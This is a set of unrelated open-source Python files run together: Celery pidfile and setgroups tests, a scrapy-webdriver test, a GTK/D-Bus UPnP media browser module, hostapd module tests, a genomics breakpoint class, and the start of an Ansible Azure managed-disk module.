def test_remove_if_stale_no_pidfile(self):
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.return_value = None
p.remove = Mock()
self.assertTrue(p.remove_if_stale())
p.remove.assert_called_with()
@patch('os.fsync')
@patch('os.getpid')
@patch('os.open')
@patch('os.fdopen')
@patch(open_fqdn)
def test_write_pid(self, open_, fdopen, osopen, getpid, fsync):
getpid.return_value = 1816
osopen.return_value = 13
w = fdopen.return_value = WhateverIO()
w.close = Mock()
r = open_.return_value = WhateverIO()
r.write('1816\n')
r.seek(0)
p = Pidfile('/var/pid')
p.write_pid()
w.seek(0)
self.assertEqual(w.readline(), '1816\n')
self.assertTrue(w.close.called)
getpid.assert_called_with()
osopen.assert_called_with(p.path, platforms.PIDFILE_FLAGS,
platforms.PIDFILE_MODE)
fdopen.assert_called_with(13, 'w')
fsync.assert_called_with(13)
open_.assert_called_with(p.path)
@patch('os.fsync')
@patch('os.getpid')
@patch('os.open')
@patch('os.fdopen')
@patch(open_fqdn)
def test_write_reread_fails(self, open_, fdopen,
osopen, getpid, fsync):
getpid.return_value = 1816
osopen.return_value = 13
w = fdopen.return_value = WhateverIO()
w.close = Mock()
r = open_.return_value = WhateverIO()
r.write('11816\n')
r.seek(0)
p = Pidfile('/var/pid')
with self.assertRaises(LockFailed):
p.write_pid()
class test_setgroups(Case):
@patch('os.setgroups', create=True)
def test_setgroups_hack_ValueError(self, setgroups):
def on_setgroups(groups):
if len(groups) <= 200:
setgroups.return_value = True
return
raise ValueError()
setgroups.side_effect = on_setgroups
_setgroups_hack(list(range(400)))
setgroups.side_effect = ValueError()
with self.assertRaises(ValueError):
_setgroups_hack(list(range(400)))
@patch('os.setgroups', create=True)
def test_setgroups_hack_OSError(self, setgroups):
exc = OSError()
exc.errno = errno.EINVAL
def on_setgroups(groups):
if len(groups) <= 200:
setgroups.return_value = True
return
raise exc
setgroups.side_effect = on_setgroups
_setgroups_hack(list(range(400)))
setgroups.side_effect = exc
with self.assertRaises(OSError):
_setgroups_hack(list(range(400)))
exc2 = OSError()
exc.errno = errno.ESRCH
setgroups.side_effect = exc2
with self.assertRaises(OSError):
_setgroups_hack(list(range(400)))
@patch('os.sysconf')
@patch('celery.platforms._setgroups_hack')
def test_setgroups(self, hack, sysconf):
sysconf.return_value = 100
setgroups(list(range(400)))
hack.assert_called_with(list(range(100)))
@patch('os.sysconf')
@patch('celery.platforms._setgroups_hack')
def test_setgroups_sysconf_raises(self, hack, sysconf):
sysconf.side_effect = ValueError()
setgroups(list(range(400)))
hack.assert_called_with(list(range(400)))
@patch('os.getgroups')
@patch('os.sysconf')
@patch('celery.platforms._setgroups_hack')
def test_setgroups_raises_ESRCH(self, hack, sysconf, getgroups):
sysconf.side_effect = ValueError()
esrch = OSError()
esrch.errno = errno.ESRCH
hack.side_effect = esrch
with self.assertRaises(OSError):
setgroups(list(range(400)))
@patch('os.getgroups')
@patch('os.sysconf')
@patch('celery.platforms._setgroups_hack')
def test_setgroups_raises_EPERM(self, hack, sysconf, getgroups):
sysconf.side_effect = ValueError()
eperm = OSError()
eperm.errno = errno.EPERM
hack.side_effect = eperm
getgroups.return_value = list(range(400))
setgroups(list(range(400)))
getgroups.assert_called_with()
getgroups.return_value = [1000]
with self.assertRaises(OSError):
setgroups(list(range(400)))
getgroups.assert_called_with()
|
from functools import partial
from time import sleep
from mock import call, Mock
from scrapy.crawler import Crawler
from scrapy.http import Request
from scrapy import log, signals
from scrapy.settings import Settings
from scrapy.spider import BaseSpider
from scrapy.xlib.pydispatch import dispatcher
from twisted.internet import reactor
from scrapy_webdriver.http import WebdriverRequest
BASE_SETTINGS = dict(
DOWNLOAD_HANDLERS={
'http': 'scrapy_webdriver.download.WebdriverDownloadHandler',
'https': 'scrapy_webdriver.download.WebdriverDownloadHandler',
},
SPIDER_MIDDLEWARES={
'scrapy_webdriver.middlewares.WebdriverSpiderMiddleware': 543,
})
class TestRequestQueue:
@classmethod
def setup_class(cls):
cls._settings = BASE_SETTINGS
def settings(self, **options):
settings = self._settings.copy()
settings.update(**options)
return settings
def _stop_reactor(self):
reactor.stop()
def _wait(self, url, *args, **kwargs):
sleep(0.1)
def test_priorization(self):
webdriver = Mock()
settings = self.settings(WEBDRIVER_BROWSER=webdriver)
webdriver.get.side_effect = self._wait
webdriver.page_source = u''
dispatcher.connect(self._stop_reactor, signal=signals.spider_closed)
crawler = Crawler(Settings(values=settings))
crawler.configure()
spider = self.Spider(name='test', domain='testdomain')
crawler.crawl(spider)
crawler.start()
log.start(loglevel='ERROR')
reactor.run()
assert webdriver.get.mock_calls == [
call('http://testdomain/path?wr=0'),
call('http://testdomain/path?wr=0&wa=0'),
call('http://testdomain/path?wr=0&wa=1'),
call('http://testdomain/path?wr=1'),
call('http://testdomain/path?wr=1&wa=0'),
call('http://testdomain/path?wr=1&wa=1'),
call('http://testdomain/path?wr=0&wa=0&wr=0'),
call('http://testdomain/path?wr=0&wa=1&wr=0'),
call('http://testdomain/path?wr=1&wa=0&wr=0'),
call('http://testdomain/path?wr=1&wa=1&wr=0')]
class Spider(BaseSpider):
def start_requests(self):
for i in xrange(2):
yield WebdriverRequest('http://testdomain/path?wr=%d' % i)
yield Request('http://testdomain/path?r=%d' % i)
def parse(self, response):
def get(url):
response.webdriver.get(url)
for i in xrange(2):
fake_url = '%s&wa=%d' % (response.url, i)
request = response.action_request(url=fake_url,
callback=self.parse_action)
# Leave a trace in the webdriver instance mock so we can look
# at the request processing order.
request.actions = Mock()
request.actions.perform.side_effect = partial(get, fake_url)
yield request
def parse_action(self, response):
yield WebdriverRequest('%s&wr=%d' % (response.url, 0),
callback=self.parse_nothing)
def parse_nothing(self, response):
pass
|
""" simple and hopefully reusable widgets to ease
the creation of UPnP UI applications
icons taken from the Tango Desktop Project
"""
import os.path
import urllib
import traceback
import pygtk
pygtk.require("2.0")
import gtk
import gobject
import dbus
from dbus.mainloop.glib import DBusGMainLoop
DBusGMainLoop(set_as_default=True)
import dbus.service
import mimetypes
mimetypes.init()
BUS_NAME = 'org.Coherence'
OBJECT_PATH = '/org/Coherence'
NAME_COLUMN = 0
ID_COLUMN = 1
UPNP_CLASS_COLUMN = 2
CHILD_COUNT_COLUMN = 3
UDN_COLUMN = 4
SERVICE_COLUMN = 5
ICON_COLUMN = 6
DIDL_COLUMN = 7
TOOLTIP_ICON_COLUMN = 8
from pkg_resources import resource_filename
class ControlPoint(object):
_instance_ = None # Singleton
def __new__(cls, *args, **kwargs):
obj = getattr(cls, '_instance_', None)
if obj is not None:
return obj
else:
obj = super(ControlPoint, cls).__new__(cls, *args, **kwargs)
cls._instance_ = obj
obj._connect(*args, **kwargs)
return obj
def __init__(self):
pass
def _connect(self):
self.bus = dbus.SessionBus()
self.coherence = self.bus.get_object(BUS_NAME,OBJECT_PATH)
class DeviceExportWidget(object):
def __init__(self,name='Nautilus',standalone=True,root=None):
self.root=root
self.uuid = None
self.name = name
self.standalone=standalone
icon = resource_filename(__name__, os.path.join('icons','emblem-new.png'))
self.new_icon = gtk.gdk.pixbuf_new_from_file(icon)
icon = resource_filename(__name__, os.path.join('icons','emblem-shared.png'))
self.shared_icon = gtk.gdk.pixbuf_new_from_file(icon)
icon = resource_filename(__name__, os.path.join('icons','emblem-unreadable.png'))
self.unshared_icon = gtk.gdk.pixbuf_new_from_file(icon)
self.filestore = gtk.ListStore(str,gtk.gdk.Pixbuf)
self.coherence = ControlPoint().coherence
def build_ui(self,root=None):
if root != None:
self.root = root
self.window = gtk.VBox(homogeneous=False, spacing=0)
self.fileview = gtk.TreeView(self.filestore)
column = gtk.TreeViewColumn('Folders to share')
self.fileview.append_column(column)
icon_cell = gtk.CellRendererPixbuf()
text_cell = gtk.CellRendererText()
column.pack_start(icon_cell, False)
column.pack_start(text_cell, True)
column.set_attributes(text_cell, text=0)
column.add_attribute(icon_cell, "pixbuf",1)
self.window.pack_start(self.fileview,expand=True,fill=True)
buttonbox = gtk.HBox(homogeneous=False, spacing=0)
button = gtk.Button(stock=gtk.STOCK_ADD)
button.set_sensitive(False)
button.connect("clicked", self.new_files)
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
button = gtk.Button(stock=gtk.STOCK_REMOVE)
#button.set_sensitive(False)
button.connect("clicked", self.remove_files)
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
button = gtk.Button(stock=gtk.STOCK_CANCEL)
button.connect("clicked", self.share_cancel)
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
button = gtk.Button(stock=gtk.STOCK_APPLY)
button.connect("clicked", self.share_files)
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
self.window.pack_end(buttonbox,expand=False,fill=False)
return self.window
def share_cancel(self,button):
for row in self.filestore:
print row
if row[1] == self.new_icon:
del row
continue
if row[1] == self.unshared_icon:
row[1] = self.shared_icon
if self.standalone:
gtk.main_quit()
else:
self.root.hide()
def share_files(self,button):
print "share_files with", self.uuid
folders = []
for row in self.filestore:
if row[1] == self.unshared_icon:
del row
continue
folders.append(row[0])
if self.uuid == None:
if len(folders) > 0:
self.uuid = self.coherence.add_plugin('FSStore', {'name': self.name,
'version':'1',
'create_root': 'yes',
'import_folder': '/tmp/UPnP Imports',
'content':','.join(folders)},
dbus_interface=BUS_NAME)
#self.coherence.pin('Nautilus::MediaServer::%d'%os.getpid(),self.uuid)
else:
result = self.coherence.call_plugin(self.uuid,'update_config',{'content':','.join(folders)})
if result != self.uuid:
print "something failed", result
for row in self.filestore:
row[1] = self.shared_icon
self.root.hide()
def add_files(self,files):
print "add_files", files
for filename in files:
for row in self.filestore:
if os.path.abspath(filename) == row[0]:
break
else:
self.add_file(filename)
def add_file(self,filename):
self.filestore.append([os.path.abspath(filename),self.new_icon])
def new_files(self,button):
print "new_files"
def remove_files(self,button):
print "remove_files"
selection = self.fileview.get_selection()
print selection
model, selected_rows = selection.get_selected_rows()
for row_path in selected_rows:
#model.remove(model.get_iter(row_path))
row = model[row_path]
row[1] = self.unshared_icon
class DeviceImportWidget(object):
def __init__(self,standalone=True,root=None):
self.standalone=standalone
self.root=root
self.build_ui()
self.init_controlpoint()
def build_ui(self):
self.window = gtk.VBox(homogeneous=False, spacing=0)
self.combobox = gtk.ComboBox()
self.store = gtk.ListStore(str, # 0: friendly name
str, # 1: device udn
gtk.gdk.Pixbuf)
icon = resource_filename(__name__, os.path.join('icons','network-server.png'))
self.device_icon = gtk.gdk.pixbuf_new_from_file(icon)
# create a CellRenderers to render the data
icon_cell = gtk.CellRendererPixbuf()
text_cell = gtk.CellRendererText()
self.combobox.pack_start(icon_cell, False)
self.combobox.pack_start(text_cell, True)
self.combobox.set_attributes(text_cell, text=0)
self.combobox.add_attribute(icon_cell, "pixbuf",2)
self.combobox.set_model(self.store)
item = self.store.append(None)
self.store.set_value(item, 0, 'Select a MediaServer...')
self.store.set_value(item, 1, '')
self.store.set_value(item, 2, None)
self.combobox.set_active(0)
self.window.pack_start(self.combobox,expand=False,fill=False)
self.filestore = gtk.ListStore(str)
self.fileview = gtk.TreeView(self.filestore)
column = gtk.TreeViewColumn('Files')
self.fileview.append_column(column)
text_cell = gtk.CellRendererText()
column.pack_start(text_cell, True)
column.set_attributes(text_cell, text=0)
self.window.pack_start(self.fileview,expand=True,fill=True)
buttonbox = gtk.HBox(homogeneous=False, spacing=0)
button = gtk.Button(stock=gtk.STOCK_ADD)
button.set_sensitive(False)
button.connect("clicked", self.new_files)
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
button = gtk.Button(stock=gtk.STOCK_REMOVE)
button.set_sensitive(False)
button.connect("clicked", self.remove_files)
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
button = gtk.Button(stock=gtk.STOCK_CANCEL)
if self.standalone:
button.connect("clicked", gtk.main_quit)
else:
button.connect("clicked", lambda x: self.root.destroy())
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
button = gtk.Button(stock=gtk.STOCK_APPLY)
button.connect("clicked", self.import_files)
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
self.window.pack_end(buttonbox,expand=False,fill=False)
def add_file(self,filename):
self.filestore.append([os.path.abspath(filename)])
def new_files(self,button):
print "new_files"
def remove_files(self,button):
print "remove_files"
def import_files(self,button):
print "import_files"
active = self.combobox.get_active()
if active <= 0:
print "no MediaServer selected"
return None
friendlyname, uuid,_ = self.store[active]
try:
row = self.filestore[0]
print 'import to', friendlyname,os.path.basename(row[0])
def success(r):
print 'success',r
self.filestore.remove(self.filestore.get_iter(0))
self.import_files(None)
def reply(r):
print 'reply',r['Result'], r['ObjectID']
from coherence.upnp.core import DIDLLite
didl = DIDLLite.DIDLElement.fromString(r['Result'])
item = didl.getItems()[0]
res = item.res.get_matching(['*:*:*:*'], protocol_type='http-get')
if len(res) > 0:
print 'importURI',res[0].importUri
self.coherence.put_resource(res[0].importUri,row[0],
reply_handler=success,
error_handler=self.handle_error)
mimetype,_ = mimetypes.guess_type(row[0], strict=False)
if mimetype.startswith('image/'):
upnp_class = 'object.item.imageItem'
elif mimetype.startswith('video/'):
upnp_class = 'object.item.videoItem'
elif mimetype.startswith('audio/'):
upnp_class = 'object.item.audioItem'
else:
upnp_class = 'object.item'
self.coherence.create_object(uuid,'DLNA.ORG_AnyContainer',
{'parentID':'DLNA.ORG_AnyContainer','upnp_class':upnp_class,'title':os.path.basename(row[0])},
reply_handler=reply,
error_handler=self.handle_error)
except IndexError:
pass
def handle_error(self,error):
print error
def handle_devices_reply(self,devices):
for device in devices:
if device['device_type'].split(':')[3] == 'MediaServer':
self.media_server_found(device)
def init_controlpoint(self):
cp = ControlPoint()
self.bus = cp.bus
self.coherence = cp.coherence
self.coherence.get_devices(dbus_interface=BUS_NAME,
reply_handler=self.handle_devices_reply,
error_handler=self.handle_error)
self.coherence.connect_to_signal('UPnP_ControlPoint_MediaServer_detected', self.media_server_found, dbus_interface=BUS_NAME)
self.coherence.connect_to_signal('UPnP_ControlPoint_MediaServer_removed', self.media_server_removed, dbus_interface=BUS_NAME)
self.devices = {}
def media_server_found(self,device,udn=None):
for service in device['services']:
service_type = service.split('/')[-1]
if service_type == 'ContentDirectory':
def got_icons(r,udn,item):
print 'got_icons', r
for icon in r:
###FIXME, we shouldn't just use the first icon
icon_loader = gtk.gdk.PixbufLoader()
icon_loader.write(urllib.urlopen(str(icon['url'])).read())
icon_loader.close()
icon = icon_loader.get_pixbuf()
icon = icon.scale_simple(16,16,gtk.gdk.INTERP_BILINEAR)
self.store.set_value(item, 2, icon)
break
def reply(r,udn):
if 'CreateObject' in r:
self.devices[udn] = {'ContentDirectory':{}}
self.devices[udn]['ContentDirectory']['actions'] = r
item = self.store.append(None)
self.store.set_value(item, 0, str(device['friendly_name']))
self.store.set_value(item, 1, str(device['udn']))
self.store.set_value(item, 2, self.device_icon)
d = self.bus.get_object(BUS_NAME+'.device',device['path'])
d.get_device_icons(reply_handler=lambda x : got_icons(x,str(device['udn']),item),error_handler=self.handle_error)
s = self.bus.get_object(BUS_NAME+'.service',service)
s.get_available_actions(reply_handler=lambda x : reply(x,str(device['udn'])),error_handler=self.handle_error)
def media_server_removed(self,udn):
row_count = 0
for row in self.store:
if udn == row[1]:
self.store.remove(self.store.get_iter(row_count))
del self.devices[str(udn)]
break
row_count += 1
class TreeWidget(object):
def __init__(self,cb_item_dbl_click=None,
cb_resource_chooser=None):
self.cb_item_dbl_click = cb_item_dbl_click
self.cb_item_right_click = None
self.cb_resource_chooser = cb_resource_chooser
self.build_ui()
self.init_controlpoint()
def build_ui(self):
self.window = gtk.ScrolledWindow()
self.window.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
icon = resource_filename(__name__, os.path.join('icons','network-server.png'))
self.device_icon = gtk.gdk.pixbuf_new_from_file(icon)
icon = resource_filename(__name__, os.path.join('icons','folder.png'))
self.folder_icon = gtk.gdk.pixbuf_new_from_file(icon)
icon = resource_filename(__name__, os.path.join('icons','audio-x-generic.png'))
self.audio_icon = gtk.gdk.pixbuf_new_from_file(icon)
icon = resource_filename(__name__, os.path.join('icons','video-x-generic.png'))
self.video_icon = gtk.gdk.pixbuf_new_from_file(icon)
icon = resource_filename(__name__, os.path.join('icons','image-x-generic.png'))
self.image_icon = gtk.gdk.pixbuf_new_from_file(icon)
self.store = gtk.TreeStore(str, # 0: name or title
str, # 1: id, '0' for the device
str, # 2: upnp_class, 'root' for the device
int, # 3: child count, -1 if not available
str, # 4: device udn, '' for an item
str, # 5: service path, '' for a non container item
gtk.gdk.Pixbuf,
str, # 7: DIDLLite fragment, '' for a non upnp item
gtk.gdk.Pixbuf
)
self.treeview = gtk.TreeView(self.store)
self.column = gtk.TreeViewColumn('MediaServers')
self.treeview.append_column(self.column)
# create a CellRenderers to render the data
icon_cell = gtk.CellRendererPixbuf()
text_cell = gtk.CellRendererText()
self.column.pack_start(icon_cell, False)
self.column.pack_start(text_cell, True)
self.column.set_attributes(text_cell, text=0)
self.column.add_attribute(icon_cell, "pixbuf",6)
#self.column.set_cell_data_func(self.cellpb, get_icon)
#self.treeview.insert_column_with_attributes(-1, 'MediaServers', cell, text=0)
self.treeview.connect("row-activated", self.browse)
self.treeview.connect("row-expanded", self.row_expanded)
self.treeview.connect("button_press_event", self.button_action)
self.treeview.set_property("has-tooltip", True)
self.treeview.connect("query-tooltip", self.show_tooltip)
self.tooltip_path = None
self.we_are_scrolling = None
def end_scrolling():
self.we_are_scrolling = None
def start_scrolling(w,e):
if self.we_are_scrolling != None:
gobject.source_remove(self.we_are_scrolling)
self.we_are_scrolling = gobject.timeout_add(800, end_scrolling)
self.treeview.connect('scroll-event', start_scrolling)
self.window.add(self.treeview)
def show_tooltip(self, widget, x, y, keyboard_mode, tooltip):
if self.we_are_scrolling != None:
return False
ret = False
try:
path = self.treeview.get_dest_row_at_pos(x, y)
iter = self.store.get_iter(path[0])
title,object_id,upnp_class,item = self.store.get(iter,NAME_COLUMN,ID_COLUMN,UPNP_CLASS_COLUMN,DIDL_COLUMN)
from coherence.upnp.core import DIDLLite
if upnp_class == 'object.item.videoItem':
self.tooltip_path = object_id
item = DIDLLite.DIDLElement.fromString(item).getItems()[0]
tooltip_icon, = self.store.get(iter,TOOLTIP_ICON_COLUMN)
if tooltip_icon != None:
tooltip.set_icon(tooltip_icon)
else:
tooltip.set_icon(self.video_icon)
for res in item.res:
protocol,network,content_format,additional_info = res.protocolInfo.split(':')
if(content_format == 'image/jpeg' and
'DLNA.ORG_PN=JPEG_TN' in additional_info.split(';')):
icon_loader = gtk.gdk.PixbufLoader()
icon_loader.write(urllib.urlopen(str(res.data)).read())
icon_loader.close()
icon = icon_loader.get_pixbuf()
tooltip.set_icon(icon)
self.store.set_value(iter, TOOLTIP_ICON_COLUMN, icon)
#print "got poster", icon
break
title = title.replace('&','&')
try:
director = item.director.replace('&','&')
except AttributeError:
director = ""
try:
description = item.description.replace('&','&')
except AttributeError:
description = ""
tooltip.set_markup("<b>%s</b>\n"
"<b>Director:</b> %s\n"
"<b>Description:</b> %s" % (title,
director,
description))
ret = True
except TypeError:
#print traceback.format_exc()
pass
except Exception:
#print traceback.format_exc()
#print "something wrong"
pass
return ret
def button_action(self, widget, event):
#print "button_action", widget, event, event.button
if self.cb_item_right_click != None:
return self.cb_item_right_click(widget, event)
return 0
def handle_error(self,error):
print error
def handle_devices_reply(self,devices):
for device in devices:
if device['device_type'].split(':')[3] == 'MediaServer':
self.media_server_found(device)
def init_controlpoint(self):
cp = ControlPoint()
self.bus = cp.bus
self.coherence = cp.coherence
self.hostname = self.coherence.hostname(dbus_interface=BUS_NAME)
self.coherence.get_devices(dbus_interface=BUS_NAME,
reply_handler=self.handle_devices_reply,
error_handler=self.handle_error)
self.coherence.connect_to_signal('UPnP_ControlPoint_MediaServer_detected', self.media_server_found, dbus_interface=BUS_NAME)
self.coherence.connect_to_signal('UPnP_ControlPoint_MediaServer_removed', self.media_server_removed, dbus_interface=BUS_NAME)
self.devices = {}
def device_has_action(self,udn,service,action):
try:
self.devices[udn][service]['actions'].index(action)
return True
except:
return False
def state_variable_change( self, udn, service, variable, value):
#print "state_variable_change", udn, service, variable, 'changed to', value
if variable == 'ContainerUpdateIDs':
changes = value.split(',')
while len(changes) > 1:
container = changes.pop(0).strip()
update_id = changes.pop(0).strip()
def match_func(model, iter, data):
column, key = data # data is a tuple containing column number, key
value = model.get_value(iter, column)
return value == key
def search(model, iter, func, data):
#print "search", model, iter, data
while iter:
if func(model, iter, data):
return iter
result = search(model, model.iter_children(iter), func, data)
if result: return result
iter = model.iter_next(iter)
return None
row_count = 0
for row in self.store:
if udn == row[UDN_COLUMN]:
iter = self.store.get_iter(row_count)
match_iter = search(self.store, self.store.iter_children(iter),
match_func, (ID_COLUMN, container))
if match_iter:
print "heureka, we have a change in ", container, ", container needs a reload"
path = self.store.get_path(match_iter)
expanded = self.treeview.row_expanded(path)
child = self.store.iter_children(match_iter)
while child:
self.store.remove(child)
child = self.store.iter_children(match_iter)
self.browse(self.treeview,path,None,
starting_index=0,requested_count=0,force=True,expand=expanded)
break
row_count += 1
def media_server_found(self,device,udn=None):
#print "media_server_found", device['friendly_name']
item = self.store.append(None)
self.store.set_value(item, NAME_COLUMN, device['friendly_name'])
self.store.set_value(item, ID_COLUMN, '0')
self.store.set_value(item, UPNP_CLASS_COLUMN, 'root')
self.store.set_value(item, CHILD_COUNT_COLUMN, -1)
self.store.set_value(item, UDN_COLUMN, str(device['udn']))
self.store.set_value(item, ICON_COLUMN, self.device_icon)
self.store.set_value(item, DIDL_COLUMN, '')
self.store.set_value(item, TOOLTIP_ICON_COLUMN, None)
self.store.append(item, ('...loading...','','placeholder',-1,'','',None,'',None))
self.devices[str(device['udn'])] = {'ContentDirectory':{}}
for service in device['services']:
service_type = service.split('/')[-1]
if service_type == 'ContentDirectory':
self.store.set_value(item, SERVICE_COLUMN, service)
self.devices[str(device['udn'])]['ContentDirectory'] = {}
def reply(r,udn):
self.devices[udn]['ContentDirectory']['actions'] = r
def got_icons(r,udn,item):
#print 'got_icons', r
for icon in r:
###FIXME, we shouldn't just use the first icon
icon_loader = gtk.gdk.PixbufLoader()
icon_loader.write(urllib.urlopen(str(icon['url'])).read())
icon_loader.close()
icon = icon_loader.get_pixbuf()
icon = icon.scale_simple(16,16,gtk.gdk.INTERP_BILINEAR)
self.store.set_value(item, ICON_COLUMN, icon)
break
def reply_subscribe(udn, service, r):
for k,v in r.iteritems():
self.state_variable_change(udn,service,k,v)
s = self.bus.get_object(BUS_NAME+'.service',service)
s.connect_to_signal('StateVariableChanged', self.state_variable_change, dbus_interface=BUS_NAME+'.service')
s.get_available_actions(reply_handler=lambda x : reply(x,str(device['udn'])),error_handler=self.handle_error)
s.subscribe(reply_handler=reply_subscribe,error_handler=self.handle_error)
d = self.bus.get_object(BUS_NAME+'.device',device['path'])
d.get_device_icons(reply_handler=lambda x : got_icons(x,str(device['udn']),item),error_handler=self.handle_error)
def media_server_removed(self,udn):
#print "media_server_removed", udn
row_count = 0
for row in self.store:
if udn == row[UDN_COLUMN]:
self.store.remove(self.store.get_iter(row_count))
del self.devices[str(udn)]
break
row_count += 1
def row_expanded(self,view,iter,row_path):
#print "row_expanded", view,iter,row_path
child = self.store.iter_children(iter)
if child:
upnp_class, = self.store.get(child,UPNP_CLASS_COLUMN)
if upnp_class == 'placeholder':
self.browse(view,row_path,None)
def browse(self,view,row_path,column,starting_index=0,requested_count=0,force=False,expand=False):
#print "browse", view,row_path,column,starting_index,requested_count,force
iter = self.store.get_iter(row_path)
child = self.store.iter_children(iter)
if child:
upnp_class, = self.store.get(child,UPNP_CLASS_COLUMN)
if upnp_class != 'placeholder':
if force == False:
if view.row_expanded(row_path):
view.collapse_row(row_path)
else:
view.expand_row(row_path, False)
return
title,object_id,upnp_class = self.store.get(iter,NAME_COLUMN,ID_COLUMN,UPNP_CLASS_COLUMN)
if(not upnp_class.startswith('object.container') and
not upnp_class == 'root'):
url, = self.store.get(iter,SERVICE_COLUMN)
if url == '':
return
print "request to play:", title,object_id,url
if self.cb_item_dbl_click != None:
self.cb_item_dbl_click(url)
return
def reply(r):
#print "browse_reply - %s of %s returned" % (r['NumberReturned'],r['TotalMatches'])
from coherence.upnp.core import DIDLLite
child = self.store.iter_children(iter)
if child:
upnp_class, = self.store.get(child,UPNP_CLASS_COLUMN)
if upnp_class == 'placeholder':
self.store.remove(child)
title, = self.store.get(iter,NAME_COLUMN)
try:
title = title[:title.rindex('(')]
self.store.set_value(iter,NAME_COLUMN, "%s(%d)" % (title,int(r['TotalMatches'])))
except ValueError:
pass
didl = DIDLLite.DIDLElement.fromString(r['Result'])
for item in didl.getItems():
#print item.title, item.id, item.upnp_class
if item.upnp_class.startswith('object.container'):
icon = self.folder_icon
service, = self.store.get(iter,SERVICE_COLUMN)
child_count = item.childCount
try:
title = "%s (%d)" % (item.title,item.childCount)
except TypeError:
title = "%s (n/a)" % item.title
child_count = -1
else:
icon=None
service = ''
if callable(self.cb_resource_chooser):
service = self.cb_resource_chooser(item.res)
else:
res = item.res.get_matching(['*:%s:*:*' % self.hostname], protocol_type='internal')
if len(res) == 0:
res = item.res.get_matching(['*:*:*:*'], protocol_type='http-get')
if len(res) > 0:
res = res[0]
remote_protocol,remote_network,remote_content_format,_ = res.protocolInfo.split(':')
service = res.data
child_count = -1
title = item.title
if item.upnp_class.startswith('object.item.audioItem'):
icon = self.audio_icon
elif item.upnp_class.startswith('object.item.videoItem'):
icon = self.video_icon
elif item.upnp_class.startswith('object.item.imageItem'):
icon = self.image_icon
stored_didl = DIDLLite.DIDLElement()
stored_didl.addItem(item)
new_iter = self.store.append(iter, (title,item.id,item.upnp_class,child_count,'',service,icon,stored_didl.toString(),None))
if item.upnp_class.startswith('object.container'):
self.store.append(new_iter, ('...loading...','','placeholder',-1,'','',None,'',None))
if((int(r['TotalMatches']) > 0 and force==False) or
expand==True):
view.expand_row(row_path, False)
if(requested_count != int(r['NumberReturned']) and
int(r['NumberReturned']) < (int(r['TotalMatches'])-starting_index)):
print "seems we have been returned only a part of the result"
print "requested %d, starting at %d" % (requested_count,starting_index)
print "got %d out of %d" % (int(r['NumberReturned']), int(r['TotalMatches']))
print "requesting more starting now at %d" % (starting_index+int(r['NumberReturned']))
self.browse(view,row_path,column,
starting_index=starting_index+int(r['NumberReturned']),
force=True)
service, = self.store.get(iter,SERVICE_COLUMN)
if service == '':
return
s = self.bus.get_object(BUS_NAME+'.service',service)
s.action('browse',
{'object_id':object_id,'process_result':'no',
'starting_index':str(starting_index),'requested_count':str(requested_count)},
reply_handler=reply,error_handler=self.handle_error)
def destroy_object(self, row_path):
#print "destroy_object", row_path
iter = self.store.get_iter(row_path)
object_id, = self.store.get(iter,ID_COLUMN)
parent_iter = self.store.iter_parent(iter)
service, = self.store.get(parent_iter,SERVICE_COLUMN)
if service == '':
return
def reply(r):
#print "destroy_object reply", r
pass
s = self.bus.get_object(BUS_NAME+'.service',service)
s.action('destroy_object',
{'object_id':object_id},
reply_handler=reply,error_handler=self.handle_error)
if __name__ == '__main__':
ui=TreeWidget()
window = gtk.Window()
window.connect("delete_event", gtk.main_quit)
window.set_default_size(350, 550)
window.add(ui.window)
window.show_all()
gtk.gdk.threads_init()
gtk.main()
|
import os
import time
import hostapd
def test_module_wpa_supplicant(dev, apdev, params):
"""wpa_supplicant module tests"""
if "OK" not in dev[0].global_request("MODULE_TESTS"):
raise Exception("Module tests failed")
# allow eloop test to complete
time.sleep(0.75)
dev[0].relog()
with open(os.path.join(params['logdir'], 'log0'), 'r') as f:
res = f.read()
if "FAIL - should not have called this function" in res:
raise Exception("eloop test failed")
def test_module_hostapd(dev):
"""hostapd module tests"""
hapd_global = hostapd.HostapdGlobal()
if "OK" not in hapd_global.ctrl.request("MODULE_TESTS"):
raise Exception("Module tests failed")
|
'''
Created on Jun 11, 2011
@author: mkiyer
'''
class Breakpoint(object):
def __init__(self):
self.name = None
self.seq5p = None
self.seq3p = None
self.chimera_names = []
@property
def pos(self):
"""
return position of break along sequence measured from 5' -> 3'
"""
return len(self.seq5p)
@staticmethod
def from_list(fields):
b = Breakpoint()
b.name = fields[0]
b.seq5p = fields[1]
b.seq3p = fields[2]
b.chimera_names = fields[3].split(',')
return b
def to_list(self):
fields = [self.name, self.seq5p, self.seq3p]
fields.append(','.join(self.chimera_names))
return fields
|
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_managed_disk
version_added: "2.4"
short_description: Manage Azure Manage Disks
description:
- Create, update and delete an Azure Managed Disk
options:
resource_group:
description:
- Name of a resource group where the managed disk exists or will be created.
required: true
name:
description:
- Name of the managed disk.
required: true
state:
description:
- Assert the state of the managed disk. Use C(present) to create or update a managed disk and C(absent) to delete a managed disk.
default: present
choices:
- absent
- present
location:
description:
- Valid Azure location. Defaults to location of the resource group.
storage_account_type:
description:
- "Type of storage for the managed disk: C(Standard_LRS) or C(Premium_LRS). If not specified the disk is created C(Standard_LRS)."
choices:
- Standard_LRS
- Premium_LRS
create_option:
description:
- "Allowed values: empty, import, copy.
- C(import) from a VHD file in I(source_uri) and C(copy) from previous managed disk I(source_uri)."
choices:
- empty
- import
- copy
source_uri:
description:
- URI to a valid VHD file to be used or the resource ID of the managed disk to copy.
aliases:
- source_resource_uri
os_type:
description:
- "Type of Operating System: C(linux) or C(windows)."
- "Used when I(create_option) is either C(copy) or C(import) and the source is an OS disk."
- "If omitted during creation, no value is set."
- "If omitted during an update, no change is made."
- "Once set, this value cannot be cleared."
choices:
- linux
- windows
disk_size_gb:
description:
- "Size in GB of the managed disk to be created."
